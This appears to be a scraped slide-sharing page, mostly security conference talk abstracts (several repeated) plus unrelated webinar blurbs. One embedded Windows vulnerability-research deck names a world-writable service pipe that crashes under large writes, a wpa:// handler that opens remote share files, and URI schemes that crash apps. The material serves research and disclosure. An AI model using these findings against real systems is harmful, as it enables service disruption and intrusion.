In this talk, we'll break down how one can exploit an ecosystem that enables management, querying, processing, and storage of, yes you guessed it, copious amounts of data. Hadoop and its many friends have been making their way into companies analyzing (sometimes, after massively collecting...) such data for years now, but they also make it easy to find organizations deploying things internally with security either off by default or otherwise exposed to various critical misconfigurations and access control issues.
If you're running engagements, this should also give you a headstart on what to look for, how to attack networks where these products are running along with a few good ways to make them more defendable. Because if you want to defend well, you need to optimize towards mitigating actual risk vs theoretical, and there's no better way to determine if attacks are real than trying them out yourself. Let's say you just want to better understand how to shell out on servers running Apache Cassandra, Drill, Mesos... well, it may add a few pages to your playbook.
(FYI this is the version of the slides without a conference template-- hopefully NoConName will share the templated version online as well)
Thinking of fuzzing applications on OS X can quickly lead to a passing conversation of "ooh exotic Mac stuff", "lets fuzz the kernel" or it can otherwise not be thought of as an exciting target, at least for looking for crashes in stuff other than Safari or the iPhone. While there are some intricacies and nuance involved, workaround for security protections to enable debugging and finding tools that work and work well, this research will detail how it can be done in a reliable way and make the topic more tangible and easier to digest, kind of like how people think about using AFL on Linux: it "just works". We'll explore some of the overlooked attack surface of file parsers and some network services on Mac, how to fuzz userland binaries and introduce a new fuzzer that makes setup and crash triage straightforward while poking at some Apple core apps and clients. Have you ever thought "This thing has got to have some bugs" but think twice because it's only on available on Mac and not worth the effort? If so, you may now find yourself both more motivated and better equipped to do some bug hunting on the sleek and eventually accommodating Mac OS.
Your SSH server configs are secure, right? If you search for hardening SSH, you can read all day about how this or that option is dangerous, or never use that flag, etc. But what really is the risk of compromise? This talk will explore various (mis)configurations and ways to use the client that perhaps have been deemed risky, but also walk through how exactly to attack them to bypass restrictions on the server or even get a shell. We'll also discuss some options that sound really bad, but more nuance is required to fully grasp what it takes to exploit the issue. You might even learn about some new features that let SSH do things you didn't think were really possible, or worse case you'll get a refresher on many attacks that have been mostly forgotten or ignored. Instead of just looking at a config or script and saying "that's bad, shouldn't do that", after this talk you should be able to demo various attacks yourself.
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was presented at the OWASP Belgium Chapter Meeting in May 2017.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was updated and presented at the FSEC conference in Croatia, September 2017.
Thinking of fuzzing applications on OS X can quickly lead to a passing conversation of "ooh exotic Mac stuff", "lets fuzz the kernel" or it can otherwise not be thought of as an exciting target, at least for looking for crashes in stuff other than Safari or the iPhone. While there are some intricacies and nuance involved, workaround for security protections to enable debugging and finding tools that work and work well, this research will detail how it can be done in a reliable way and make the topic more tangible and easier to digest, kind of like how people think about using AFL on Linux: it "just works". We'll explore some of the overlooked attack surface of file parsers and some network services on Mac, how to fuzz userland binaries and introduce a new fuzzer that makes setup and crash triage straightforward while poking at some Apple core apps and clients. Have you ever thought "This thing has got to have some bugs" but think twice because it's only on available on Mac and not worth the effort? If so, you may now find yourself both more motivated and better equipped to do some bug hunting on the sleek and eventually accommodating Mac OS.
Your SSH server configs are secure, right? If you search for hardening SSH, you can read all day about how this or that option is dangerous, or never use that flag, etc. But what really is the risk of compromise? This talk will explore various (mis)configurations and ways to use the client that perhaps have been deemed risky, but also walk through how exactly to attack them to bypass restrictions on the server or even get a shell. We'll also discuss some options that sound really bad, but more nuance is required to fully grasp what it takes to exploit the issue. You might even learn about some new features that let SSH do things you didn't think were really possible, or worse case you'll get a refresher on many attacks that have been mostly forgotten or ignored. Instead of just looking at a config or script and saying "that's bad, shouldn't do that", after this talk you should be able to demo various attacks yourself.
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was presented at the OWASP Belgium Chapter Meeting in May 2017.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
HTTP For the Good or the Bad - FSEC EditionXavier Mertens
A review of the webshells used by bad guys. How they are protected but also mistakes in their implementation. This talk was updated and presented at the FSEC conference in Croatia, September 2017.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL-injection have dominated the web security landscape. However, as browsers and applications are becoming increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploit side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peak into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
Presented at the Yahoo! Web Development Summit in December 2007. Comet is the new name for the old trick of streaming events down to the browser from the server. This talk introduces Comet and shows how, despite the terrifying browser tricks needed, it's actually now very simple to build against.
This talk will cover how powerfull are buffer overflows, how weak are mitigations against them, why are buffer overflows still possible in those days, how generic are they, and example how useful is turn race conditions to buffer overflow. Race conditions are nice example for that, because they are one of the hardest to find and on of the easiest to make. example is on Linux kernel (droids included), but talk will be keeped for buffer overflows in general (mainly for windows & Linux kernel)
Asynchronous PHP and Real-time MessagingSteve Rhoades
With every major browser supporting WebSockets, HTML 5 has changed how we handle client to server communications. The high demand for real time client and server messaging has developers flocking away from PHP to languages such as Node.js. In this session we'll explore the libraries and extensions that make Asynchronous PHP possible and analyze the performance differences with Node.js. In addition we'll identify use cases and walk through examples of how Asynchronous PHP can handle everything from WebSockets and Message Queues to MySQL.
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
Help, my browser is leaking! Exploring XSLeaks attacks and defenses - Tom Van...NoNameCon
https://cfp.nonamecon.org/nnc2020/talk/9LMJAH/
For many years, injection-based vulnerabilities such as XSS and SQL-injection have dominated the web security landscape. However, as browsers and applications are becoming increasingly complex, new vulnerability classes surface. One of these new-kids-on-the-block is XSLeaks, a vulnerability class that exploit side-channel leaks in the browser to extract information across origins. In this presentation, I will describe the various types of leaks in different browser features and the network layer, and discuss how these issues can be exploited to extract sensitive information from an unwitting victim. Furthermore, the talk will cover the numerous (new) defences that need to be adopted in order to safeguard web applications (SameSite cookies, COOP, COEP, ...), and their potential shortcomings. Finally, we will take a peak into the future, and discuss how XSLeaks will likely evolve in the coming months and years.
Presented at the Yahoo! Web Development Summit in December 2007. Comet is the new name for the old trick of streaming events down to the browser from the server. This talk introduces Comet and shows how, despite the terrifying browser tricks needed, it's actually now very simple to build against.
This talk will cover how powerfull are buffer overflows, how weak are mitigations against them, why are buffer overflows still possible in those days, how generic are they, and example how useful is turn race conditions to buffer overflow. Race conditions are nice example for that, because they are one of the hardest to find and on of the easiest to make. example is on Linux kernel (droids included), but talk will be keeped for buffer overflows in general (mainly for windows & Linux kernel)
Asynchronous PHP and Real-time MessagingSteve Rhoades
With every major browser supporting WebSockets, HTML 5 has changed how we handle client to server communications. The high demand for real time client and server messaging has developers flocking away from PHP to languages such as Node.js. In this session we'll explore the libraries and extensions that make Asynchronous PHP possible and analyze the performance differences with Node.js. In addition we'll identify use cases and walk through examples of how Asynchronous PHP can handle everything from WebSockets and Message Queues to MySQL.
DevOops & How I hacked you DevopsDays DC June 2015Chris Gates
In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates and Ken Johnson will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. This talk will most definitely be an entertaining one but a cautionary tale as well, provoking attendees into action. Ultimately, this is research targeted towards awareness for those operating within a DevOps environment.
MariaDB best practices for user and permissions management, secrets storage, SSL, encryption at rest, and more. Includes an overview of MariaDB most advanced security features. Webinar organised in December 2023.
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
Watch the slides of our webinar on “How to secure MongoDB with ClusterControl” and find out about the essential steps necessary to secure MongoDB and how to verify if your MongoDB instance is safe.
The recent MongoDB ransom hack caused a lot of damage and outages, while it could have been prevented with maybe two or three simple configuration changes. MongoDB offers a lot of security features out of the box, however it disables them by default.
In this webinar, we explain which configuration changes are necessary to enable MongoDB’s security features, and how to test if your setup is secure after enablement. We also demonstrate how ClusterControl enables security on default installations. And we cover how to leverage the ClusterControl advisors and the MongoDB Audit Log to constantly scan your environment, and harden your security even more.
AGENDA
What is the MongoDB ransom hack?
What other security threats are valid for MongoDB?
How to enable authentication / authorisation
How to secure MongoDB from ransomware
How to scan your system
ClusterControl MongoDB security advisors
Live Demo
SPEAKER
Art van Scheppingen is a Senior Support Engineer at Severalnines. He’s a pragmatic MySQL and Database expert with over 15 years experience in web development. He previously worked at Spil Games as Head of Database Engineering, where he kept a broad vision upon the whole database environment: from MySQL to Couchbase, Vertica to Hadoop and from Sphinx Search to SOLR. He regularly presents his work and projects at various conferences (Percona Live, FOSDEM) and related meetups.
In a rare mash-up, DevOps is increasingly blending the work of both application and network security professionals. In a quest to move faster, organizations can end up creating security vulnerabilities using the tools and products meant to protect them. Both Chris Gates (carnal0wnage) and Ken Johnson (cktricky) will share their collaborative research into the technology driving DevOps as well as share their stories of what happens when these tools are used insecurely as well as when the tools are just insecure.
Technologies discussed will encompass AWS Technology, Chef, Puppet, Hudson/Jenkins, Vagrant, Kickstart and much, much more. Everything from common misconfigurations to remote code execution will be presented. This is research to bring awareness to those responsible for securing a DevOps environment.
Jaime Piña, @variadico, Software Engineer at Apcera
Microservice issues are networking issues. Fixing code in your app is easy, but the hard part of using microservices is the networking. How do you actually know if you're sending what you think you are? Why does this request fail in my app, but not when I use curl? Is this service very slow or is it up at all?
This talk will help demystify some common problems you might experience while building out your collection of microservices. Once you can find the issue, it becomes way easier to fix.
HashiConf Digital 2020: HashiCorp Vault configuration as code via HashiCorp T...Andrey Devyatkin
Hippo Technologies uses the Vault provider for Terraform. Every month, new features and capabilities are added to the provider, allowing them to improve their Vault configuration management continuously. In this talk, Andrey will share Hippo's journey, from the first, basic, steps of Terraforming Vault, to where they are now. He'll delve into what went well, what didn't work, and what you should consider before you embark on this journey, like incorporating DevSecOps.
Troubleshooting Tips from a Docker Support EngineerJeff Anderson
Troubleshooting is like going on an adventure. Here are some tips for how to tackle unexpected situations when using Docker.
These cases were pulled from the most common issues encountered while helping folks in the Docker community solve issues.
Troubleshooting Tips from a Docker Support Engineer - Jeff Anderson, DockerDocker, Inc.
Docker makes everything easier. But even with the easiest platforms, sometimes you run into problems. In this session, you'll learn first hand from someone whose job is helping customers fix these problems. Using Docker and Docker Data Center, you can keep your apps running smoothly with minimal downtime. In this session, you'll learn how to apply your troubleshooting skills in the Docker ecosystem, including: 1. Identification and characterization of the problem. 2. Command line tools to inspect networking and namespaces. 3. Applying these skills to your workloads on OSS Docker and on DDC.
In addition to authorization policies that control what a user can do, OpenShift Container Platform gives its administrators the ability to manage a set of security context constraints (SCCs) for limiting pods and securing their cluster.
Default security context may be too restrictive for containers pulled down from DockerHub, thorugh this talk we'll explore the various steps to execute for enabling required permissions on selected OpenShift's pods.
Containerization helps us bundle dependencies with applications instead of having to use configuration management to prepare machines for running them, hence making build once run anywhere easy. For legacy applications this can be quite hard though when they spread persistent data across the file system.
In this talk I'll show how we can quickly set up a Go.CD server and agents for our Continuous Delivery pipelines on Google Cloud. The infrastructure creation is handled by Terraform, the server and agents are custom built Docker containers.
DragonCon 2016
Attack surface on Windows is vast and full of opportunities. It has been explored upside down and inside out, although there's always room for other ways to look at it. In this talk, I'll be discussing how to discover attack surface by poking the OS in various ways to reveal interfaces and opportunities often otherwise found by either luck or winning a timing race. Starting a discussion on these components will shake out new bugs or design subtleties as they may have yet to be audited in depth. We'll walk through tooling for both the offensive and defensive angles. I'll be looking at the latest version of Windows 10 and also Server. If you're interested in finding vulnerabilities in the most prevalent platform on earth, or a developer with the urge to know more about application security, this talk is for you and will probably give you some new ideas.
Provoking Windows
For every action, there is a reaction
MSI installer creates many mutexes
Notably one called _MSIExecute
RW Everyone
Commonly checked to ensure only one installation at a time is occurring
Interesting #1
But, everyone can write to \BNO…
Turn on WLAN Autoconfig Service
New pipe with a very generous ACEs…
\\.\pipe\WiFiNetworkManagerTask
O:LSG:LSD:(A;;FA;;;WD)(A;;FA;;;CO)(A;;FA;;;IU)(A;;FA;;;RC)(A;;FA;;;BA)
Interesting #2
We can kill the pipe by looping large Write()s
But what happened?
svchost.exe @ wifinetworkmanager.dll
STATUS_STACK_BUFFER_OVERRUN
wifinetworkmanager.dll!__FatalError(char const *,unsigned long,char const *, …..)
AsyncPipe::ReadCompletedCallback(void)
AsyncPipe::Dispatch(int,void *,void *, …..)
Synchronizer::EnqueueEvent(…..)
\Driver\SoftwareDevice
BUILTIN_DRIVER (???)
SoftwareDevice class per c_swdevice.inf
Doesn’t have .sys loaded, nor many normal things
Exposes many devices during RDP sessions
Some of which are RW everyone
Windows Time
Creates an Event
W32TIME_NAMED_EVENT_SYSTIME_NOT_CORRECT
Squatting on this event produces an exception
svchost.exe @ ntdll.dll (w32time.dll in call stack)
STATUS_STACK_BUFFER_OVERRUN
Not likely a controllable crash, but notable nonetheless
wpa://C:\[trace file path here]/
Launches Windows Performance Analyzer on arbitrary file
Local bugs in WPA file parsing become remote
wpa://\\share\PhotosAppTracing.etl/
.etl, .wpa, .xml, .wpapk, .zip, .cab all fair game
The “crash immediately” club
com.microsoft.builder3d:///
hx-accounts:///
microsoft.windows.photos.crop:///
microsoft.windows.photos.picker:///
ms-wpdrmv:///
ms-apprep:/// (smartscreen)
read:/// (edge)
Tooling
Whale
“What happened at last exec?”
At the end of the day, the ones writing the code also wrote the bugs
No other people put bugs in your code (probably)
Thoughts on Disclosure
There’s no overall good way to disclose
Coordinated Disclosure
Great for vendor, not great for everyone else
Drop bug
Varies depending on your subscribed philosophy
With the 'rise of containers' comes also the rise of container platforms. And while Docker is the way to do things for now, Podman has also been gaining traction as the new kid on the block especially after being somewhat embraced by RedHat and Fedora. Being new also comes with lack of heavy scrutiny and audit on the security side of things. Once you start integrating other protocols and pieces that compliment each other, such as Varlink, boundaries become fuzzy. Rather than focus on container breakouts, which are also very important, we'll focus on how Podman and Varlink interoperate and the authentication and security implications as such. We'll look at the remote API capabilities, secure configurations and how certain setups and projects out there by default can be vulnerable to compromise. By the end of the talk, we will have discussed various bugs, issues and hardening techniques around deploying Podman and Varlink together and if you don't know a lot about containers, you'll learn a bit along the way.
What happens when a company either doesn’t fully empower the Security team, or have one at all? Stuff like Goto fail, Equifax, unsandboxed AVs and infinite other buzz, or yet to be buzzed, words describe failures of not adequately protecting customers or services they rely on. Having a solid security team enables a company to set a bar, ensure security exists within the design, insert tooling at various stages of the process and continuously iterate on such results. Working with the folks building the products to give them solutions instead of just problems allows one to scale, earn trust and most importantly be effective and actually ship.
There’s a whole security industry out there with folks wearing every which hat you can think of. They have influence and the ability to find a bug one day and disclose it the next, so companies must adapt both engineering practices and perspectives in order to ‘navigate the waters of reality’ and not just hope one doesn’t take a look at their product. Having processes in place that reduce attack surface, automate testing and set a minimum bar can reduce bugs therefore randomization for devs therefore cost of patching and create a culture where security makes more sense as it demonstratively solves problems.
Nvidia is evolving in this space. Focused on the role of product security, I’ll go through the various components of a security team and how they each interact and complement each other, commodity and niche tooling as well as how relationships across organizations can give one an edge in this area. This talk balances the perspective of security engineers working within a large company with the independent nature of how things work in the industry.
Attendees will walk away with a breadth of knowledge, an inside view of the technical workings, tooling and intricacies of finding and fixing bugs and finding balance within a product-first world.
Microsoft Vulnerability Research - How to be a finder as a vendorJeremy Brown
You may think of Microsoft as a company that fixes vulnerabilities, but we frequently find security issues in other vendors’ products as well. Microsoft Vulnerability Research (MSVR) was created to help ensure that our company demonstrates the same behavior, in the role of a finder, that we’d like to see from other companies and researchers from all over the world. We make sure that our reports are complete and accurate and communicated securely and effectively to the right place. This presentation will cover how and why MSVR was created, an in-depth look at our operations and what we’ve learned so far with this program. We’ll also discuss how your company can have a centralized program to do the same. We’ll finish things off with a run through of an example vulnerability that one of our finders discovered, reported through MSVR, and what is was like working to get it fixed with an advisory we released thereafter.
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
The web client is critical software to secure from any perspective. No matter if you're an organization or a casual client, you're typically just as vulnerable as anyone else. OSes are often supplemented with hardening toolsets or built-in mitigations as an extra measure to avoid compromise, but as with all things, they aren't completely solid either. Thus the need for systems that break systems, some of which deploy fuzzing and almost all of them work to find implementation bugs. Browser fuzzing has been explored and improved in many different ways over the past several years. In this presentation, we'll be primarily talking about a mutation engine that provides a somewhat novel technique for finding bugs in a still-ripe attack surface: the browser's rendering engine. This technique has the flexibility to be applied even more broadly than browsers, for example, there's initial support for fuzzing PDF readers. We'll also be discussing the tooling and infrastructure areas of the process, detailing what's needed to build a system that will scale and enable your fuzzing strategies to be successful. Finally, we can conclude the talk with some incubation results and how you can start making use of these fuzzing techniques today to find the bugs you need to exploit browsers or identify and fix the code responsible for each vulnerability.
POC Conference 2015
Virtual Appliances have become very prevalent these days as virtualization is ubiquitous and hypervisors commonplace. More and more of the major vendors are providing literally virtual clones for many of their once physical-only products. Like IoT and the CAN bus, it's early in the game and vendors are late as usual. One thing that it catching these vendors off guard is the huge additional attack surface, ripe with vulnerabilities, added in the process. Also, many vendors see software appliances as an opportunity for the customer to easily evaluate the product before buying the physical one, making these editions more accessible and debuggable by utilizing features of the platform on which it runs. During this talk, I will provide real case studies for various vulnerabilities created by mistakes that many of the major players made when shipping their appliances. You'll learn how to find these bugs yourself and how the vendors went about fixing them, if at all. By the end of this talk, you should have a firm grasp of how one goes about getting remote root on appliances.
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And, he'll give you some useful guidelines on how to close the gaps yourself.
A Bug Hunter's Perspective on Unix DriversJeremy Brown
The Unix driver space with regards to security has been understudied compared to it’s vast attack surface. One juicy area that can be especially buggy and accessible in drivers, I/O control, has received much more attention on Windows than Unix OSes. In this presentation, I will give an introduction to this particular attack surface on Linux, why bugs here are a significant threat and show you how get started looking for vulnerabilities in drivers on the platform. I’ll also go into some of the tools and techniques available and talk about a new tool I’ve written that can help bug hunters dig into Unix device drivers.
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Welcome to the first live UiPath Community Day Dubai! Join us for this unique occasion to meet our local and global UiPath Community and leaders. You will get a full view of the MEA region's automation landscape and the AI Powered automation technology capabilities of UiPath. Also, hosted by our local partners Marc Ellis, you will enjoy a half-day packed with industry insights and automation peers networking.
📕 Curious on our agenda? Wait no more!
10:00 Welcome note - UiPath Community in Dubai
Lovely Sinha, UiPath Community Chapter Leader, UiPath MVPx3, Hyper-automation Consultant, First Abu Dhabi Bank
10:20 A UiPath cross-region MEA overview
Ashraf El Zarka, VP and Managing Director MEA, UiPath
10:35: Customer Success Journey
Deepthi Deepak, Head of Intelligent Automation CoE, First Abu Dhabi Bank
11:15 The UiPath approach to GenAI with our three principles: improve accuracy, supercharge productivity, and automate more
Boris Krumrey, Global VP, Automation Innovation, UiPath
12:15 To discover how Marc Ellis leverages tech-driven solutions in recruitment and managed services.
Brendan Lingam, Director of Sales and Business Development, Marc Ellis
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdfPaige Cruz
Monitoring and observability aren’t traditionally found in software curriculums and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is a part of your current company’s observability stack.
While the dev and ops silo continues to crumble….many organizations still relegate monitoring & observability as the purview of ops, infra and SRE teams. This is a mistake - achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party will share these foundational concepts to build on:
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofsAlex Pruden
